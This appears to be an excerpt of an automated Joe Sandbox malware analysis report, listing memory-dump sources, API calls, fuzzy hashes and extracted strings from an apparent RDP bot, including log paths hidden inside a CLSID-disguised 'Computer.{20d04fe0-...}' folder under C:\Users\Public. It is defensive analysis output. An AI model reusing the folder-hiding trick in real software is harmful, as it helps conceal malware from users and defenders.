                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: 39e38a57139edd1975c326b3cb320ea4fca86ff0345f0a920947b35f90d8c6bf
                                                      • Instruction ID: 2f3695fd6f6435be7c8220f793141c64d6f2239e919c89103c07d069d7b2b0a1
                                                      • Opcode Fuzzy Hash: 39e38a57139edd1975c326b3cb320ea4fca86ff0345f0a920947b35f90d8c6bf
                                                      • Instruction Fuzzy Hash: 7421ABA2B0AA4389E7129F15FC507AA23A1FB457E4F484032EE8C47766CF7CD985D748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: fb2c5f8eb68c6f532567d251cdbef5bf6d7f4981018d47d77449ccd008b35209
                                                      • Instruction ID: 9f544daa92a01d082aae0f4a93ee33f5599b083b6aaa142f1301db18990d8673
                                                      • Opcode Fuzzy Hash: fb2c5f8eb68c6f532567d251cdbef5bf6d7f4981018d47d77449ccd008b35209
                                                      • Instruction Fuzzy Hash: F021D06A70EA4BD6E3528F55F8507AA33A0BB56B84F844032EE4C07762DF3CE845D708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: 0cf6c5a104619dcc860f5f8e98ebeb390f6b58a9fd0989ccc1a454da9a2e6fd0
                                                      • Instruction ID: b36edaaeb67b3b844a5f750d6d1f1897ebeeca0e15ed4fb109ecabdb4e395c01
                                                      • Opcode Fuzzy Hash: 0cf6c5a104619dcc860f5f8e98ebeb390f6b58a9fd0989ccc1a454da9a2e6fd0
                                                      • Instruction Fuzzy Hash: ED21F621B0AA8F86EB508F14F8507AA7361BB46B85F448032EE8D47762DF7DE849C304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: 9dd2d07f19f7bb78d8c530cd41200e9f5a3a17d9f828d2801ea5e2be8c310e9f
                                                      • Instruction ID: 56c8daa0dab08c8177327e91f02670ee99b5debfdf28c9e96a44a21183b274f1
                                                      • Opcode Fuzzy Hash: 9dd2d07f19f7bb78d8c530cd41200e9f5a3a17d9f828d2801ea5e2be8c310e9f
                                                      • Instruction Fuzzy Hash: A521CC6770AA42C5E2529F11F8607AA23E0FB847E8F444032EE8C07756DF3CE845C705
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                      • API String ID: 1004003707-3780280517
                                                      • Opcode ID: 106c19c6459ba6de99c2f714aaae266b3271569f9a077c5e79c2136b899037ee
                                                      • Instruction ID: 8b43bd3f248b1108b1ffe773c8e7bc94740a0879e7ccd08ae6b6ff34a89f0e50
                                                      • Opcode Fuzzy Hash: 106c19c6459ba6de99c2f714aaae266b3271569f9a077c5e79c2136b899037ee
                                                      • Instruction Fuzzy Hash: D2418B69B0A64F91FE129F50E9683B46260BF03B44F450932EA4D0A3D7EF7DA649C70C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                      • API String ID: 1004003707-3780280517
                                                      • Opcode ID: 520c4cb442c3ebc73427937b641df97523420bbd38006ec49e6527b41253b669
                                                      • Instruction ID: fb9a456a1d36a8f8b738ae5bd62c5c2b80eb19e2b466802eaef15c15d0564b6b
                                                      • Opcode Fuzzy Hash: 520c4cb442c3ebc73427937b641df97523420bbd38006ec49e6527b41253b669
                                                      • Instruction Fuzzy Hash: C0414E69B0F64FE1FA228F10E8603F46250BF56B48F844472EA8D4A396DF7CE655D308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                      • API String ID: 1004003707-3780280517
                                                      • Opcode ID: 3886bcf048027362acec68b809de9163c1e8a6e697dceffa47f0cd1afbcbabe4
                                                      • Instruction ID: 0c1338b8f3942b7001729926263ac863ff2d855b522e3b9b0c41d1cfe7463287
                                                      • Opcode Fuzzy Hash: 3886bcf048027362acec68b809de9163c1e8a6e697dceffa47f0cd1afbcbabe4
                                                      • Instruction Fuzzy Hash: E9415361F0A64F96FE548B51E8203F52350BB06B46F858932EB4D063A3EF7DE54AC308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                      • API String ID: 1004003707-3780280517
                                                      • Opcode ID: 1e5e7d716c40fda68bd4041f42aafef0815e82db2a5e351da6f34470d705bf0c
                                                      • Instruction ID: 82f498b310547ccd2476e9c8e54e020e1ea2ef26b84175537d077d3a2a37981e
                                                      • Opcode Fuzzy Hash: 1e5e7d716c40fda68bd4041f42aafef0815e82db2a5e351da6f34470d705bf0c
                                                      • Instruction Fuzzy Hash: 41412A6BB0AA47D5FA529B51EA603F962E0FB543E8F448032DA4C06397DF3CE945C349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                      • API String ID: 1004003707-386092548
                                                      • Opcode ID: 377e8652e17eed6466362e1f55ec8f66dbc5ffa75ed2dd203fb680f462ad1773
                                                      • Instruction ID: a263582d1d333018f43001a1cd65653533deab65e36d873c106991c20493d36e
                                                      • Opcode Fuzzy Hash: 377e8652e17eed6466362e1f55ec8f66dbc5ffa75ed2dd203fb680f462ad1773
                                                      • Instruction Fuzzy Hash: 0D414DA9B0AA4F91FE12AF80A8683B42250BF47B48F454536DA4C163E3EF3DE545C70C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                      • API String ID: 1004003707-386092548
                                                      • Opcode ID: 56b59aa19423780b5026dc0729af1700e2a8fe1ce78730d6a1e8012a8c69571a
                                                      • Instruction ID: 022c57c307d58bd86c1269e8ff27ee602cd9482e53fe0695311b1cf5f4480b81
                                                      • Opcode Fuzzy Hash: 56b59aa19423780b5026dc0729af1700e2a8fe1ce78730d6a1e8012a8c69571a
                                                      • Instruction Fuzzy Hash: 87414269B0F64FE5FB228F20E8603B46250AF62B48F844476DA0D0A793DF7CE945D308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                      • API String ID: 1004003707-386092548
                                                      • Opcode ID: f0443edcf3f04fd30a4adbc8c979c323cfb7dd93a8a0e8607432220d00bd6f0e
                                                      • Instruction ID: 2329a2711bec9c84747a02f0c7e175414a4954c5dc419dcd556183878aa03a8f
                                                      • Opcode Fuzzy Hash: f0443edcf3f04fd30a4adbc8c979c323cfb7dd93a8a0e8607432220d00bd6f0e
                                                      • Instruction Fuzzy Hash: 864162A1F0A54F9AFE548B00E8217B52210BF12B8AF558436EB4D067A3EF7DE549C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                      • API String ID: 1004003707-386092548
                                                      • Opcode ID: 93323fb79a3863e3d9a00266f6e99e82c7afa1fbf390ff36a4282fd3e10854d5
                                                      • Instruction ID: 8d27ef00ae75c3be6b6535217efcb249652612ee25b516bfa6e86bd7bbc8c783
                                                      • Opcode Fuzzy Hash: 93323fb79a3863e3d9a00266f6e99e82c7afa1fbf390ff36a4282fd3e10854d5
                                                      • Instruction Fuzzy Hash: B3412C67B0AA47D5FA539B40EA603B522A0FB513ECF444032DA4C06797DF3CE946D389
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen
                                                      • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                                      • API String ID: 39653677-1686225151
                                                      • Opcode ID: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
                                                      • Instruction ID: 5482558e656a6049119e98a93bec276044e6508a858fdbce1b346a5726812ca6
                                                      • Opcode Fuzzy Hash: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
                                                      • Instruction Fuzzy Hash: 6221E5D2A0CB4341FB207A25BC04BBD96904F55BE9FC88030DA4F0B78ADF2CA8548361
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                                      • API String ID: 513531256-2601447032
                                                      • Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
                                                      • Instruction ID: bbf50ed0d2a449191082bf4d100c2bc9e9a3b851f4969ecd845203d559348e87
                                                      • Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
                                                      • Instruction Fuzzy Hash: E6418C6AB0A68986F322DF55E8607B92261FB8BF80F500035DE0D87797DF2DE5958708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                                      • API String ID: 513531256-2729875187
                                                      • Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
                                                      • Instruction ID: 564adb8ab9619d95538c756fa826987e55b1490873f45a780f2402da86efb840
                                                      • Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
                                                      • Instruction Fuzzy Hash: 6E416B66B0E64586F322AB11E8B03AA2260BB997E4F500031DA4E5779BDF3CE585C74C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                                      • API String ID: 513531256-2115573132
                                                      • Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
                                                      • Instruction ID: 62b38fb98594c3ee67b6966a7e69074a294034bc0c2473cc80875f543e162659
                                                      • Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
                                                      • Instruction Fuzzy Hash: E241A429B0E64A86F322AF11E8657B967D0FB96F50FC00070E94D47797CF2CE5859B08
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                      • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                                      • API String ID: 513531256-1680544107
                                                      • Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
